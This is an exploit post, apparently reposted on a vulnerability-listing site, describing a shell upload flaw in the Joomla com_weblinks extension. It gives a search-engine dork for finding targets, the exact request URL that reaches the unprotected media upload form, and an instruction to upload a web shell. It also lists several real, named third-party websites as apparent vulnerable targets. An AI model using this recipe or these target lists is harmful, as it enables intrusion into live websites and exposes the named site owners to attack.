Joomla com_weblinks Shell Upload Vulnerability

2017.08.18
iq Dyar Sahdi (IQ) iq
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title : Joomla com_weblinks Shell Upload Vulnerability # Exploit Author : Dyar Sahdi # Website : https://www.facebook.com/Dyar.Sahdi.Linux # Dork : allinurl:/index.php?option e_name jform_description asset=com_weblinks ----------------------------------------------------------------------- Exploit Tools ---------------------- http://extensions.joomla.org/extensions/extension/official-extensions/weblinks ------------------------------------------------------------------------------------- Test On: Kali Linux, Win7, Win xp, win10 --------------------------------------------------- First Select Sait using Dorks -------------------------- Example: http://www.elitecreative.ca/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= ------------------------------------------------------------------------------------------------------------------------------- http ://sait/site/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= ----------------------------------------------- Learin Upload shell ---------------------- Just Upload your Shell or txt or Image to Upload Field Shell Directory : http://localhost/site/images/dyar.txt ---------------------------- http://www.orrca.org.au/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= # http://egyptfuntours.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= # http://englishshotokan.net/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author= #################################################################


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top